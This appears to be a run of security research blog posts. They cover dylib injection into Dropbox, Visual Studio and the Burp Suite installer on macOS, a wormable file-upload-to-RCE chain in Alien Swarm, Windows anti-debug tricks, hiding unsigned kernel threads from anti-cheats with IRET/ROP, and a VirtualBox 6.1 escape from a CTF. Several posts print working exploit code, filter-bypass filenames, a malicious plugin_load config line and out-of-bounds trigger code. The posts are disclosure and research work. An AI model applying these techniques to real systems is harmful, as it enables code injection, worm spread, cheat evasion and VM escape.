There are three configurable options, though the third is hidden by default - App Store only, App Store and identified developers, and “anywhere”, the third presumably hidden to minimize accidental compromise. Gatekeeper can also be managed by the command line tool, spctl(8), for more granular control of the system. One can even disable Gatekeeper entirely through spctl --master-disable, though this requires superuser access. It’s to be noted that this does not invalidate rules already in the System Policy database (/var/db/SystemPolicy), but allows anything not in the database, regardless of notarization, etc, to run unimpeded.

Now, back to Dropbox. Dropbox is compiled using the hardened runtime, meaning that without specific entitlements, JIT code cannot be executed, DYLD environment variables are automatically ignored, and unsigned libraries are not loaded (often resulting in a SIGKILL of the binary.) We can see that Dropbox allows unsigned executable memory, allowing shellcode injection, and has library validation disabled - meaning that any library can be inserted into the process. But how?

Using LIEF, we can easily add a new LoadCommand to Dropbox. In the following picture, you can see my tool, Coronzon, which is based off of yololib, doing the same.

Adding a LoadCommand to Dropbox

import lief

file = lief.parse('Dropbox')

Using code similar to the following, one can execute code within the context of the Dropbox process (albeit via voiding the code signature - you’re best off stripping the code signature, or it won’t run from /Applications/). You’ll either have to strip the code signature or ad-hoc sign it to get it to run from /Applications/, though the application will lose any entitlements and TCC rights previously granted. You’ll have to use a technique known as dylib proxying - which is to say, replacing a library that is part of the application bundle with one of the same name that re-exports the library it’s replacing. (Using the link-time flags `-Xlinker -reexport_library $(PATH_TO_LIBRARY)).

#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>

static void customConstructor(int argc, const char **argv)
     printf("Hello from dylib!\n");
     syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
     system("open -a Calculator");

This is a simple example, but combined with something like frida-gum the impact becomes much more severe - allowing application introspection and runtime modification without the user’s knowledge. This makes for a great, persistent usermode implant, as Dropbox is added as a LaunchItem.

Visual Studio

Microsoft releases a cut-down version of their premier IDE for MacOS, mainly for C# development with Xamarin, .NET Core, and Mono. Though ‘cut-down’, it still supports many features of the original, including NuGet, IntelliSense, and more.

It also has some interesting entitlements.

Viewing the entitlements of the main Visual Studio binary.

Of course, MacOS users are treated as second class citizens in Microsoft’s ecosystem and Microsoft could not give a damn about the impact this has on the end user - which is similar in impact to the above, albeit more severe. We can see that basically every single feature of the hardened runtime is disabled - enabling the simplest of code injection methods, via the DYLD_INSERT_LIBRARIES environment variable. The following video is a proof of concept of just how easily code can be executed within the context of Visual Studio.

Keep in mind: code executing in this context will inherit the entitlements and TCC values of the parent. It’s not hard to imagine a scenario in which IP (intellectual property) theft could result from Microsoft’s attempts at ‘hardening’ Visual Studio for Mac. As with Dropbox, all the security implications are the same, yet it’s about 30x easier to pull off as DYLD environment variables are allowed.

Burp Suite

I’m sure most reading this article are familiar with Burp Suite. If not - it’s a web exploitation Swiss army knife that aids in recon, pre, and post-exploitation. So why don’t we exploit it?

This time, we’ll be exploiting the Burp Suite installer. As you’ll probably guess by now, it has some… interesting entitlements.

Viewing the entitlements of the Burp Installer stub.

Aside from the output lacking newlines, exploitation in this case is different. There are no shell scripts in the install (nor is the entitlement for allowing DYLD environment variables present), and if we’re going to create a malicious installer, we need to use what’s already packaged. So, we’ll tamper with the included JRE (jre.tar.gz) that’s included with the installer.

There’s actually two approaches to this - replacing a dylib outright or dylib hijacking. Dylib hijacking is similar to it’s partner, DLL hijacking, on Windows, in that it abuses the executable searching for a library that may or may not be there, usually specified by @rpath or sometimes a ‘weakref’. A weakref is a library that doesn’t need to be loaded, but can be loaded. For more information on dylib hijacking, I reccomend this excellent presentation by Patrick Wardle of Objective-See. For brevity, however, we’ll just be replacing a .dylib in the JRE.

The way the installer executes is that it extracts the JRE to a temporary location during install, which is used for the rest of the install. This temporary location is randomized and actually adds a layer of obfuscation to our attack, as no two executions will have the JRE extracted into the same place. Once the JRE is extraced, it’s loaded and attempts to install Burp Suite. This allows us to execute unsigned code under the guise and context of Burp Suite, running code in the background unbenknownst to the user. Thankfully Burp Suite doesn’t (currently) require elevated privileges to install on macOS. Nonetheless, this is an issue due to the ease of forging a malicious installer and the fact that Gatekeeper is none the wiser.

A proof of concept can be viewed below.


Entitlements are both a valuable component of MacOS’ security model, but can also be a double edged sword. You’ve seen how trivivally Gatekeeper and existing OS protections can be bypassed by leveraging a weak application as a trampoline - the one with the most impact in this case I argue to be Dropbox, due to inheritance of Dropbox’s TCC permissions and being a LaunchItem, thus gaining persistence. Thus, entitlements provide a valuable addition to the attack surface of MacOS for any red-teamer or bug-bounty hunter. Your mileage may vary, however - Dropbox and Microsoft didn’t seem to care much. (PortSwigger, on the other hand, admitted that due to the design of Burp Suite and inherent language intrinsics it’s extremely hard to prevent such an attack - and I don’t fault them).

Happy hacking.

Disclosure Timelines


  • June 11th, initial disclosure.
  • June 17th, additional information added
  • June 20th, closed as Informative

Visual Studio

  • June 19th, initial disclosure
  • June 22nd, closed (“Upon investigation, we have determined that this submission does not meet the bar for security servicing. This report does not appear to identify a weakness in a Microsoft product or service that would enable an attacker to compromise the integrity, availability, or confidentiality of a Microsoft offering. “)

Burp Suite

  • June 27th, initial disclosure
  • June 30th, closed as Informative

Wormable remote code execution in Alien Swarm

By: mev
30 October 2020 at 23:00

Alien Swarm was originally a free game released circa July 2010. It differs from most Source Engine games in that it is a top-down shooter, though with gameplay elements not dissimilar from Left 4 Dead. Fallen to the wayside, a small but dedicated community has expanded the game with Alien Swarm: Reactive Drop. The game averages about 800 users per day at peak, and is still actively updated.

Over a decade ago, multiple logic bugs in Source and GoldSrc titles allowed execution of arbitrary code from client to server, and vice-versa, allowing plugins to be stolen or arbitrary data to be written from client to server, or the reverse. We’ll be exploring a modern-day example of this, in Alien Swarm: Reactive Drop.

Client <-> Server file upload

Any Alien Swarm client can upload files to the game server (and vice versa) using the CNetChan->SendFile API, although with some questionable constraints: a client-side check in the game prevents the server from uploading files of certain extensions such as .dll, .cfg:

if ( (!(*(unsigned __int8 (__thiscall **)(int, char *, _DWORD))(*(_DWORD *)(dword_104153C8 + 4) + 40))(
         dword_104153C8 + 4,
   || should_redownload_file((int)filename))
  && !strstr(filename, "//")
  && !strstr(filename, "\\\\")
  && !strstr(filename, ":")
  && !strstr(filename, "lua/")
  && !strstr(filename, "gamemodes/")
  && !strstr(filename, "addons/")
  && !strstr(filename, "..")
  && CNetChan::IsValidFileForTransfer(filename) ) // fails if filename ends with ".dll" and more
{ /* accept file */ }
bool CNetChan::IsValidFileForTransfer( const char *input_path )
    char fixed_slashes[260];

    if (!input_path || !input_path[0])
        return false;

    int l = strlen(input_path);
    if (l >= sizeof(fixed_slashes))
        return false;

    strncpy(fixed_slashes, input_path, sizeof(fixed_slashes));
    FixSlashes(fixed_slashes, '/');
    if (fixed_slashes[l-1] == '/')
        return false;

    if (
        stristr(input_path, "lua/")
        || stristr(input_path, "gamemodes/")
        || stristr(input_path, "scripts/")
        || stristr(input_path, "addons/")
        || stristr(input_path, "cfg/")
        || stristr(input_path, "~/")
        || stristr(input_path, "gamemodes.txt")
        return false;

    const char *ext = strrchr(input_path, '.');
    if (!ext)
        return false;

    int ext_len = strlen(ext);
    if (ext_len > 4 || ext_len < 3)
        return false;

    const char *check = ext;
    while (*check)
        if (isspace(*check))
            return false;


    if (!stricmp(ext, ".cfg") ||
        !stricmp(ext, ".lst") ||
        !stricmp(ext, ".lmp") ||
        !stricmp(ext, ".exe") ||
        !stricmp(ext, ".vbs") ||
        !stricmp(ext, ".com") ||
        !stricmp(ext, ".bat") ||
        !stricmp(ext, ".dll") ||
        !stricmp(ext, ".ini") ||
        !stricmp(ext, ".log") ||
        !stricmp(ext, ".lua") ||
        !stricmp(ext, ".nut") ||
        !stricmp(ext, ".vdf") ||
        !stricmp(ext, ".smx") ||
        !stricmp(ext, ".gcf") ||
        !stricmp(ext, ".sys"))
        return false;

    return true;

Bypassing "//" and ".." can be done with "/\\" because there is a call to FixSlashes that makes proper slashes after the sanity check, and for the ".." the "/\\" will set the path to the root of the drive, so we can write to anywhere on the system if we know the path. Bypassing "lua/", "gamemodes/" and "addons/" can be done by using capital letters e.g. "ADDONS/" since file paths are not case sensitive on Windows.

Bypassing the file extension check is a bit more tricky, so let’s look at the structure sent by SendFile called dataFragments_t:

typedef struct dataFragments_s
    FileHandle_t    file;                 // open file handle
    char            filename[260];        // filename
    char*           buffer;               // if NULL it's a file
    unsigned int    bytes;                // size in bytes
    unsigned int    bits;                 // size in bits
    unsigned int    transferID;           // only for files
    bool            isCompressed;         // true if data is bzip compressed
    unsigned int    nUncompressedSize;    // full size in bytes
    bool            isReplayDemo;         // if it's a file, is it a replay .dem file?
    int             numFragments;         // number of total fragments
    int             ackedFragments;       // number of fragments send & acknowledged
    int             pendingFragments;     // number of fragments send, but not acknowledged yet
} dataFragments_t;

The 260 bytes name buffer in dataFragments_t is used for the file name checks and filters, but is later copied and then truncated to 256 bytes after all the sanity checks thus removing our fake extension and activating the malicious extension:

Q_strncpy( rc->gamePath, gamePath, BufferSize /* BufferSize = 256 */ );

Using a file name such as ./././(...)/file.dll.txt (pad to max length with ./) would get truncated to ./././(...)/file.dll on the receiving end after checking if the file extension is valid. This also has the side effect that we can overwrite files as the file exists check is done before the file extension truncation.

Remote code execution

Using the aforementioned remote file inclusion, we can upload Source Engine config files which have the potential to execute arbitrary code. Using Procmon, I discovered that the game engine searches for the config file in both platform/cfg and swarm/cfg respectively:


We can simply upload a malicious plugin and config file to platform/cfg and hijack the server. This is due to the fact that the Source Engine server config has the capability to load plugins with the plugin_load command:

plugin_load addons/alien_swarm_exploit.dll

This will load our dynamic library into the game server application, granting arbitrary code execution. The only constraint is that the newmapsettings.cfg config file is only reloaded on map change, so you will have to wait till the end of a game.

Wormable demonstration

Since both of these exploits apply to both the server and the client, we can infect a server, which can infect all players, which can carry on the virus when playing other servers. This makes this exploit chain completely wormable and nothing but a complete shutdown of the game servers can fix it.


  • [2020-05-12] Reported to Valve on HackerOne
  • [2020-05-13] Triaged by Valve: “Looking into it!”
  • [2020-08-03] Patched in beta branch
  • [2020-08-18] Patched in release

New year, new anti-debug: Don’t Thread On Me

By: jm
4 January 2021 at 23:00

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added into 19H1. Ever wondered why there is a hole in thread creation flags? Well, the hole has been filled with a flag that I’ll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it’s actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

NTSTATUS PsSuspendProcess(_EPROCESS* Process)
  const auto currentThread = KeGetCurrentThread();

  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  return status;

So as you can see, NtSuspendProcess that calls PsSuspendProcess will simply ignore the thread with this flag. Another bonus is that the thread also doesn’t get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so you can’t do much against it.

As far as its usefulness goes, I’d say this is just a nice little extra against dumping and causes confusion when you click suspend in Processhacker, and the process continues to chug on as if nothing happened.


For example, here is a somewhat funny code that will keep printing I am running. I am sure that seeing this while reversing would cause a lot of confusion about why the hell one would suspend his own process.


NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running\n");
    return STATUS_SUCCESS;

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);


Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that suspend count is a signed 8-bit value. Just like for the previous one, here’s some code to give you an understanding of the inner workings:

ULONG KeSuspendThread(_ETHREAD *Thread)
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
  return oldSuspendCount;

If you take a look at the first code sample with PsSuspendProcess it has no error checking and doesn’t care if you can’t suspend a thread anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they’ll actually leave the count in a state it wasn’t previously in.


The simple code below is rather effective:

  • Visual Studio - prevents it from pausing the process once attached.
  • WinDbg - gets detected on attach.
  • x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
  • ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.
for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended\n");


If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Hiding execution of unsigned code in system threads

By: drew
12 January 2021 at 00:00

Anti-cheat development is, by nature, reactive; anti-cheats exist to respond to and thwart a videogame’s population of cheaters. For instance, a videogame with an exceedingly low amount of cheaters would have little need for an anti-cheat, while a videogame rife with cheaters would have a clear need for an anti-cheat. In order to catch cheaters, anti-cheats will employ as many methods as possible. Unfortunately, anti-cheats are not omniscient; they can not know of every single method or detection vector to catch cheaters. Likewise, the game hacks themselves must continue to discover new or unique methods in order to evade anti-cheats.

The Reactive Development Cycle of Game Hacking

This brings forth a reactive and continuous development cycle, for both the cheats and anti-cheats: the opposite party (cheat or anti-cheat) will employ a unique method to circumvent the adjacent party (anti-cheat or cheat) which, in response, will then do the same.

One such method employed by an increasing number of anti-cheats is to execute core anti-cheat functions from within the operating system’s kernel. A clear advantage over the alternative (i.e. usermode execution) is in the fact that, on Windows NT systems, the anti-cheat can selectively filter which processes are able to interact with the memory of the game process in which they are protecting, thus nullifying a plethora of methods used by game hacks.

In response to this, many (but not all) hack developers made (or are making) the decision to do the same; they too would, or will, execute their hack, either wholly or in part, from within the operating system’s kernel, thus nullifying what the anti-cheats had done.

Unlike with anti-cheats, however, this decision carries with it numerous concessions: namely, the fact that, for various reasons, it is most convenient (or it is only practical) to execute the hack as an unsigned kernel driver running without the kernel’s knowledge; the “driver” is typically a region of executable memory in the kernel’s address space and is never loaded or allocated by the kernel. In other words, it is a “manually-mapped” driver, loaded by a tool used by a game hack.

This ultimately provides anti-cheats with many opportunities to detect so-called “kernel-mode” or “ring 0” game hacks (noting that those terms are typically said with a marketable significance; they are literally used to market such game hacks, as if to imply robustness or security); if the anti-cheat can prove that the system is executing, or had executed, unsigned code, it can then potentially flag a user as being a cheater.

Analyzing a Thread’s Kernel Stack

One such method - the focus of this article, in fact - of detecting unsigned code execution in the kernel is to iterate each thread that is running in the system (optionally deciding to only iterate threads associated with the system process, i.e. system threads) and to initiate some kind of stack trace.

Bluntly, this allows the anti-cheat to quite effectively determine if a cheat were executing unsigned code. For example, some anti-cheats (e.g. BattlEye) will queue to each system thread an APC which will then initiate a stack trace. If the stack trace returns an instruction pointer that is not within the confines of any loaded kernel driver, the anti-cheat can then know that it may have encountered a system thread that is executing unsigned code. Furthermore, because it is a stack trace and not a direct sampling of the return instruction pointer, it would work quite reliably, even if a game hack were, for example, executing a spin-loop or continuous wait; the stack trace would always lead back to the unsigned code.

It is quite clear to any cheat developer that they can respond to this behavior by simply running their thread(s) with kernel APCs disabled, preventing delivery of such APCs and avoiding the detection vector. As is will be seen, however, this method does not entirely prevent detection of unsigned code execution.

(Copying Out, Then) Analyzing a Thread’s Kernel Stack

Certain anti-cheats - EasyAntiCheat, in particular - had a much more apt method of generating a pseudo-stacktrace: instead of generating a stack trace with a blockable APC, why not copy the contents of the thread’s kernel stack asynchronously? Continuing the reactive cheat-anti-cheat development cycle, EasyAntiCheat had opted to manually search for instances of nonpaged code pointers that may have been left behind as a result of system thread execution.

While the downsides of this method are debatable, the upside is quite clear: as long as the thread is making procedure calls (e.g. x86 call instruction) from within its own code, either to kernel routines or to its own, and regardless of its IRQL or if the thread is even running, its execution will leave behind detectable traces on its stack in the form of pointers to its own code which can be extracted and analyzed.

Callouts: Continuing The Reactive Development Cycle

Proposed is the “callout” method of system thread execution, born from the recognition that:

  1. A thread’s kernel stack, as identified by the kernel stack pointer in a thread’s ETHREAD object, can be analyzed asynchronously by a potential anti-cheat to detect traces of unsigned code execution; and that
  2. To be useful in most cases, a system thread must be able to make calls to most external NT kernel or executive procedures with little compromise.

The Life-cycle of the Callout Thread

The life-cycle of a callout thread is quite simple and can be used to demonstrate its implementation:

  • Before thread creation:
    • Allocate a non-paged stack to be loaded by the thread; the callout thread’s “real stack”
    • Allocate shellcode (ideally in executable memory not associated with the main driver module) which disables interrupts, preserves the old/kernel stack pointer (as it was on function entry), loads the real stack, and jumps to an initialization routine (the callout thread’s “bootstrap routine”)
    • Create a system thread (i.e. PsCreateSystemThread) whose start address points to the initialization shellcode
  • At thread entry (i.e. the bootstrap routine):
    • Preserve the stack pointer that had been given to the thread at thread entry (this must be given by the shellcode)
    • (Optionally) Iterate the thread’s old/kernel stack pointer, ceasing iteration at the stack base, eliminating any references/pointers to the initialization shellcode
    • (Optionally) Eliminate references to the initialization shellcode within the thread’s ETHREAD; for example, it may be worth changing the thread’s start address
    • (Optionally, but recommended) Free the memory containing the initialization shellcode, if it was allocated separately from the driver module
    • Proceed to thread execution

In clearer terms, the callout thread spends most of its time executing the driver’s unsigned code with interrupts disabled and with its own kernel stack - the real stack. It can also attempt to wipe any other traces of its execution which may have been present upon its creation.

The Usefulness of the Callout Thread

The callout thread must also be capable of executing most, if not all, NT kernel and executive procedures. As proposed, this is effectively impossible; the thread must run with interrupts disabled and with its own stack, thus creating an obvious problem as most procedures of interest would run at an IRQL <= DISPATCH_LEVEL. Furthermore, the NT IRQL model may be liable to ignore our setting of the interrupt flag, causing most routines to unpredictibly enter a deadlock or enable interrupts without our consent.

A mechanism to allow for a callout thread to invoke these routines of interest, the callout mechanism, is therefore used to:

  1. Provide a routine which can be used to conveniently invoke (“call out”) an external function; and in this routine,
  2. Load the thread’s original/kernel stack pointer;
  3. Copy function arguments on to the kernel thread’s stack from the real stack;
  4. Enable interrupts;
  5. Invoke the requested routine (within the same instruction boundary as when interrupts are enabled);
  6. Cleanly return from the routine without generating obvious stack traces (e.g. function pointers);
  7. Load the real stack pointer and disable the interrupt flag, and do so before returning to unsigned code; and
  8. Continue execution, preserving the function’s return value

While somewhat complicated, the callout mechanism can be achieved easily and, to a reasonable degree, portably, using two widely-available ROP gadgets from within the NT kernel.

The Usefulness of IRET(Q)

The constraint of needing to load a new stack pointer, interrupt flag, and interrupt pointer within an instruction boundary was immediately satisfied by the IRET instruction.

For those unfamiliar, the IRET (lit. “interrupt return”) instruction is intended to be used by an operating system or executive (here, the NT kernel) to return from an interrupt routine. To support the recognition of an interrupt from any mode of execution, and to generically resume to any mode of execution, the processor will need to (effectively) preserve the instruction pointer, stack pointer, CPL or privilege level (through the CS and SS selectors; and while they have a more general use-case, this is effectively what is preserved on most operating systems with a flat memory model), and RFLAGS register (as interrupts may be liable to modify certain flags).

To report this information to the OS interrupt handler, the CPU will, in a specific order:

  1. Push the SS (stack segment selector) register;
  2. Push the RSP (stack pointer) register;
  3. Push the RFLAGS (arithmetic/system flags) register;
  4. Push the CS (code segment selector) register;
  5. Push the RIP (instruction pointer) register; and, for some exception-class interrupts,
  6. Push an error code which may describe certain interrupt conditions (e.g. a page fault will know if the fault was caused by a non-present page, or if it were caused by a protection violation)

Note that the error code is not important to the CPU and must be accounted for by the interrupt handler. Each operation is an 8-byte push, meaning that, when the interrupt handler is invoked, the stack pointer will point to the preserved RIP (or error code) values.

It is hopefully obvious as to how, approximately, the IRET instruction would be implemented:

  1. Pop a value from the stack to retrieve the new instruction pointer (RIP)
  2. Pop a value from the stack to retrieve the new code segment selector (CS)
  3. Pop a value from the stack to retrieve the new arithmetic/system flags register (RFLAGS)
  4. Pop a value from the stack to retrieve the new stack pointer (RSP)
  5. Pop a value from the stack to retrieve the new stack segment selector (SS)

Or, as modeled as a series of pseudo-assembly instructions,


;note that all push and pop operations are 8 bytes (64 bits) wide!
push ss
push rsp
push rflags
push cs
push rip ;return instruction pointer
;optionally, push a zero-extended 4-byte error code. any interrupt which pushes an error code must have its handler add 8 bytes to their instruction pointer before executing its IRET.


pop rip ;pop return instruction pointer into RIP. do not treat this as a series of regular assembly instructions; treat it instead as CPU microcode!
pop cs
pop rflags
pop rsp
pop ss

The callout mechanism uses the IRET instruction to accomplish its constraints, as the desired RFLAGS (which holds the interrupt flag), instruction pointer, and stack pointer can be loaded by the instruction at the same time (within an instruction boundary).

ROP; Chaining It All Together

To reiterate, the callout routine uses IRET to change the instruction pointer, stack pointer, and interrupt flag within the same instruction boundary in order to jump to external procedures with the interrupt flag enabled. This must be done within an instruction boundary to prevent unfortunately-timed external interrupts from being received just before the external procedure call.

It, however, must also be able to return from the external procedure call without leaving unsigned code pointers on the kernel stack; furthermore, it must also not rely on unlikely/unaligned ROP gadgets (e.g. a cli;ret sequence) which may not exist on future NT kernel builds. Thus also required is an IRET instruction to be executed upon the routine’s completion.

It must be recognized that the nature of the IRET instruction is such that the return instruction pointer is located on the stack. However, it is also recognized that a new stack pointer is loaded. We can therefore use IRET to load the callout thread’s real stack, with the stack pointer pointing to the actual return address.

This eliminates the problem of code pointers being present in the kernel stack; the return address back to our thread’s execution is located on another stack loaded by IRET and which isn’t obviously visible on a stack trace. To facilitate this, the stack frame loaded by the IRET gadget must be such that the return instruction pointer simply contains a RET instruction.

So, the ideal stack frame when calling an external procedure is as such:

  1. IRET return data, where the return address is a RET instruction within ntoskrnl.exe (or any region of signed code), and where the stack pointer to load is the thread’s real stack; which would have a return address pushed on to it; and
  2. The address of an IRET instruction within a region of signed code

Within most, if not all, versions of ntoskrnl.exe, this can be achieved with a simple RET instruction (0xC3 byte); along with the following gadget:

mov rsp, rbp
mov rbp, [rbp + some_offset] ;where some_offset could be liable to change
add rsp, some_other_offset

This also slightly modifies the mechanism of the ROP chain in that it must also load a pointer to the desired IRET frame in RBP when calling the function. Thankfully, the x64 calling convention specifies the RBP register as non-volatile, or unchanging across function calls, meaning that we can initialize it with our desired pointer when invoking the external procedure. It also means that the callout mechanism is permitted to allocate a non-paged region of memory to be given in RBP; preventing it from having to keep an IRET frame on the kernel stack. This notes, of course, the potential for an awful race condition where an interrupt is received in between the mov rsp, rbp and iretq instructions; the stack pointer value may point to memory that is insufficient to use for stack operations.

In having the external procedure return to the above IRET gadget, we can easily return to our unsigned code without ever leaking unsigned code pointers on the kernel stack.


An example implementation of the callout mechanism can be found here.

Escaping VirtualBox 6.1: Part 1

14 January 2021 at 23:00

This post is about a VirtualBox escape for the latest currently available version (VirtualBox 6.1.16 on Windows). The vulnerabilities were discovered and exploited by our team Sauercl0ud as part of the RealWorld CTF 2020/2021.

The vulnerability was known to the organizers, requires the guest to be able to insert kernel modules and isn’t exploitable on default configurations of VirtualBox so the impact is very limited.

Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, M4x for always being helpful, answering our questions and sitting with us through the many demo attempts and of course all the people involved in writing the exploit.

Let’s get to some pwning :D

Discovering the Vulnerability

The challenge description already hints at where a bug might be:


Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.

You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.

But you can’t do anything in the host, including modifying the guest configuration file, etc.

Hint: SCSI controller is enabled and marked as bootable.


In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:

  • VirtualBox:6.1.16-140961-Win_x64.
  • Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
  • Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.

The only special thing about the VM is that the SCSI driver is loaded and marked bootable so that’s the place for us to start looking for vulnerabilities.

Here are the operations the SCSI device supports:

// /src/VBox/Devices/Storage/DevBusLogic.cpp
    // [...]

    if (fBootable)
        /* Register I/O port space for BIOS access. */
        rc = PDMDevHlpIoPortCreateExAndMap(pDevIns, BUSLOGIC_BIOS_IO_PORT, 4 /*cPorts*/, 0 /*fFlags*/,
                                           buslogicR3BiosIoPortWrite,       // Write a byte
                                           buslogicR3BiosIoPortRead,        // Read a byte
                                           buslogicR3BiosIoPortWriteStr,    // Write a string
                                           buslogicR3BiosIoPortReadStr,     // Read a string
                                           NULL /*pvUser*/,
                                           "BusLogic BIOS" , NULL /*paExtDesc*/, &pThis->hIoPortsBios);
        // [...]
    // [...]

The SCSI device implements a simple state machine with a global heap allocated buffer. When initiating the state machine, we can set the buffer size and the state machine will set a global buffer pointer to point to the start of said buffer. From there on, we can either read one or more bytes, or write one or more bytes. Every read/write operation will advance the buffer pointer. This means that after reading a byte from the buffer, we can’t write that same byte and vice versa, because the buffer pointer has already been advanced.

While auditing the vboxscsiReadString function, tsuro and spq found something interesting:

// src/VBox/Devices/Storage/VBoxSCSI.cpp

 * @retval VINF_SUCCESS
int vboxscsiReadString(PPDMDEVINS pDevIns, PVBOXSCSI pVBoxSCSI, uint8_t iRegister,
                       uint8_t *pbDst, uint32_t *pcTransfers, unsigned cb)
    LogFlowFunc(("pDevIns=%#p pVBoxSCSI=%#p iRegister=%d cTransfers=%u cb=%u\n",
                 pDevIns, pVBoxSCSI, iRegister, *pcTransfers, cb));

     * Check preconditions, fall back to non-string I/O handler.
    Assert(*pcTransfers > 0);

    /* Read string only valid for data in register. */
    AssertMsgReturn(iRegister == 1, ("Hey! Only register 1 can be read from with string!\n"), VINF_SUCCESS);

    /* Accesses without a valid buffer will be ignored. */
    AssertReturn(pVBoxSCSI->pbBuf, VINF_SUCCESS);

    /* Check state. */

     * Also ignore attempts to read more data than is available.
    uint32_t cbTransfer = *pcTransfers * cb;
    if (pVBoxSCSI->cbBufLeft > 0)
        Assert(cbTransfer <= pVBoxSCSI->cbBuf);     // --- [1] ---
        if (cbTransfer > pVBoxSCSI->cbBuf)
            memset(pbDst + pVBoxSCSI->cbBuf, 0xff, cbTransfer - pVBoxSCSI->cbBuf);
            cbTransfer = pVBoxSCSI->cbBuf;  /* Ignore excess data (not supposed to happen). */

        /* Copy the data and adance the buffer position. */
               pVBoxSCSI->pbBuf + pVBoxSCSI->iBuf,  // --- [2] ---

        /* Advance current buffer position. */
        pVBoxSCSI->iBuf      += cbTransfer;
        pVBoxSCSI->cbBufLeft -= cbTransfer;         // --- [3] ---

        /* When the guest reads the last byte from the data in buffer, clear
           everything and reset command buffer. */

        if (pVBoxSCSI->cbBufLeft == 0)              // --- [4] ---
            vboxscsiReset(pVBoxSCSI, false /*fEverything*/);
        memset(pbDst, 0, cbTransfer);
    *pcTransfers = 0;

    return VINF_SUCCESS;

We can fully control cbTransfer in this function. The function initially makes sure that we’re not trying to read more than the buffer size [1]. Then, it copies cbTransfer bytes from the global buffer into another buffer [2], which will be sent to the guest driver. Finally, cbTransfer bytes get subtracted from the remaining size of the buffer [3] and if that remaining size hits zero, it will reset the SCSI device and require the user to reinitiate the machine state, before reading any more bytes.

So much for the logic, but what’s the issue here? There is a check at [1] that ensures no single read operation reads more than the buffer’s size. But this is the wrong check. It should verify, that no single read can read more than the buffer has left. Let’s say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This will advance the buffer pointer to point to the 40th byte. Now we call the function again and tell it to read 2 more bytes. The check in [1] won’t bail out, since 2 is less than the buffer size of 40, however we will have read 41 bytes in total. Additionally, this will cause the subtraction in [3] to underflow and cbBufLeft will be set to UINT32_MAX-1. This same cbBufLeft will be checked when doing write operations and since it is very large now, we’ll be able to also write bytes that are outside of our buffer.

Getting OOB read/write

We understand the vulnerability, so it’s time to develop a driver to exploit it. Ironically enough, the “getting a driver to build” part was actually one of the hardest (and most annoying) parts of the exploit development. malle got to building VirtualBox from source in order for us to have symbols and a debuggable process while 0x4d5a came up with the idea of using the HEVD driver as a base for us to work with, since it does some similar things to what we need. Now let’s finally start writing some code.

Here’s how we triggered the bug:

void exploit() {
    static const uint8_t cdb[1] = {0};
    static const short port = 0x434;
    static const uint32_t buffer_size = 1024;

    // reset the state machine
    __outbyte(port+3, 0);

    // initiate a write operation
    __outbyte(port+0, 0); // TargetDevice (0)
    __outbyte(port+0, 1); // direction (to device)
    __outbyte(port+0, ((buffer_size >> 12) & 0xf0) | (sizeof(cdb) & 0xf)); // buffer length hi & cdb length
    __outbyte(port+0, buffer_size);                                        // bugger length low
    __outbyte(port+0, buffer_size >> 8);                                   // buffer length mid
    for(int i = 0; i < sizeof(cdb); i++)
        __outbyte(port+0, cdb[i]);

    // move the buffer pointer to 8 byte after the buffer and the remaining bytes to -8
    char buf[buffer_size];
    __inbytestring(port+1, buf, buffer_size - 1)    // Read bufsize-1
    __inbytestring(port+1, buf, 9)                  // Read 9 more bytes

    for(int i = 0; i < sizeof(buf); i += 4)
        *((uint32_t*)(&buf[i])) = 0xdeadbeef
    for(int i = 0; i < 10000; i++)
        __outbytestring(port+1, buf, sizeof(buf))

